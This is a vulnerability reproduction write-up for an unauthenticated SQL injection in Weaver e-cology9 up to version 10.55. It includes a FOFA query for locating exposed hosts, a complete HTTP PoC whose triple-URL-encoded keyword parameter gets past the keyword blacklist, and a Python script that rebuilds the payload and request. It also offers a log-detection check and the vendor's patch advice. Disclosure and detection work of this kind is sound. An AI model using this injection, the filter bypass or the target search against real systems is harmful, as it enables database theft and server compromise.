1. Product introduction
Weaver (泛微, also transliterated as Fanwei or Panwei) e-cology is a large-scale enterprise collaborative management platform that combines an enterprise information portal, knowledge and document management, workflow management, human resource management, customer relationship management, project management, financial management, asset management, supply chain management and a data center in one product.
2. Vulnerability overview
Weaver e-cology9 contains a SQL injection vulnerability in /mobile/%20/plugin/browser.jsp. An unauthenticated remote attacker can use it to read sensitive information from the database, and further exploitation may lead to a full compromise of the target system.
3. Scope of influence
Affected versions
Weaver e-cology9 <= 10.55
Unaffected versions
Weaver e-cology9 >= 10.56
4. Reproduce the environment
FOFA: app="泛微-协同商务系统" (the fingerprint must be the Chinese string; a translated string such as "Weaver-Collaborative Business System" does not match)
5. Vulnerability recurrence
Open the target in a browser, capture the request with Burp Suite and send it to the Repeater module.
PoC currently circulating on the Internet:
POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Content-Length: 649
isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537
Note: the PoC passes three parameters (the body above is 649 bytes; Burp Repeater updates Content-Length automatically when you edit the payload):
1. isDis must be 1.
2. browserTypeId selects the server-side browser handler that is invoked; the PoC uses 269.
3. keyword is the injection point. It is URL-encoded three times to get past Weaver's filtering mechanism: the blacklist replaces SQL keywords such as select and union with their full-width equivalents, but the triple-encoded value contains no recognizable keyword, so nothing is replaced and the server decodes it to the original SQL. Decoded three times, the value above is a' union select 1,''+(SELECT @@VERSION)+' (Microsoft SQL Server syntax).
The payload queries the database version via @@VERSION; the version string appears in the response.
The vulnerability was reproduced successfully.
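The following Python script is an added example; it is not part of the original advisory and is not Weaver's code. It reproduces the PoC's triple URL encoding from the plain SQL fragment, decodes it back, builds the raw request with a correct Content-Length, and models the bypass: a keyword blacklist that rewrites SQL keywords to full-width characters (an assumption about how the real filter works, derived only from the description above) sees nothing to replace in the encoded value, while the plain value is mangled. The POC_PREFIX constant is the first 45 characters of the keyword value from the PoC above; everything runs offline.

```python
import re
from urllib.parse import quote, unquote

# Plain SQL fragment carried by the PoC's `keyword` parameter (MSSQL: @@VERSION,
# '+' string concatenation). Decoding the PoC value three times yields exactly this.
PLAIN_KEYWORD = "a' union select 1,''+(SELECT @@VERSION)+'"

# First 45 characters of the PoC's keyword value, used as a cross-check.
POC_PREFIX = "%2525%2536%2531%2525%2532%2537%2525%2532%2530"


def hex_all(s: str) -> str:
    """Percent-encode every byte, including letters and digits (as the PoC does)."""
    return "".join(f"%{b:02x}" for b in s.encode())


def poc_encode(s: str) -> str:
    """Reproduce the PoC's layering: hex-encode everything twice, then encode the
    remaining '%' signs once more:  'a' -> %61 -> %25%36%31 -> %2525%2536%2531."""
    return quote(hex_all(hex_all(s)), safe="")


def poc_decode(s: str, layers: int = 3) -> str:
    """Undo `layers` rounds of percent-decoding."""
    for _ in range(layers):
        s = unquote(s)
    return s


# --- Model of the blacklist the advisory describes (assumption, not Weaver's code) ---
BLACKLIST = ("select", "union", "insert", "update", "delete", "from", "where")


def to_fullwidth(word: str) -> str:
    """ASCII -> full-width form, e.g. 'select' -> 'ｓｅｌｅｃｔ' (U+FF41 ...)."""
    return "".join(chr(ord(c) + 0xFEE0) if 0x21 <= ord(c) <= 0x7E else c for c in word)


def keyword_filter(value: str) -> str:
    """Case-insensitive replacement of blacklisted words with full-width characters."""
    for word in BLACKLIST:
        value = re.sub(re.escape(word), lambda m: to_fullwidth(m.group(0)), value, flags=re.I)
    return value


def server_view(raw_param: str, decode_layers: int = 3) -> str:
    """Modelled pipeline: the filter inspects the parameter as received, the value is
    decoded afterwards. That ordering (an assumption) is what makes the bypass work."""
    return poc_decode(keyword_filter(raw_param), decode_layers)


def build_request(host: str, keyword_encoded: str, browser_type_id: int = 269) -> str:
    """Raw HTTP request text of the PoC with a Content-Length that matches the body."""
    body = f"isDis=1&browserTypeId={browser_type_id}&keyword={keyword_encoded}"
    return (
        "POST /mobile/%20/plugin/browser.jsp HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body.encode())}\r\n\r\n{body}"
    )


def looks_like_layered_encoding(body: str) -> bool:
    """Defender-side check: '%2525' means a percent sign was itself percent-encoded
    twice, which ordinary form submissions essentially never contain."""
    return "%2525" in body


if __name__ == "__main__":
    enc = poc_encode(PLAIN_KEYWORD)
    print(enc.startswith(POC_PREFIX), len(enc))            # matches the PoC, 615 chars
    print(server_view(PLAIN_KEYWORD))                       # keywords rewritten to full-width
    print(server_view(enc))                                 # original SQL reaches the query
    print(build_request("your-ip", enc).split("\r\n")[3])   # Content-Length: 649
```

The filter model is deliberately simple; the point it demonstrates is ordering: any blacklist that runs before the final decoding round can be defeated by adding one more encoding layer, which is why the vendor patch, not a tighter keyword list, is the fix. The looks_like_layered_encoding check is a cheap signal for hunting this PoC in web server logs of unpatched hosts.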
6. Repair suggestion
The vendor has released a security patch; affected users are advised to upgrade to version 10.56 or later as soon as possible.
https://www.weaver.com.cn/cs/securityDownload.asp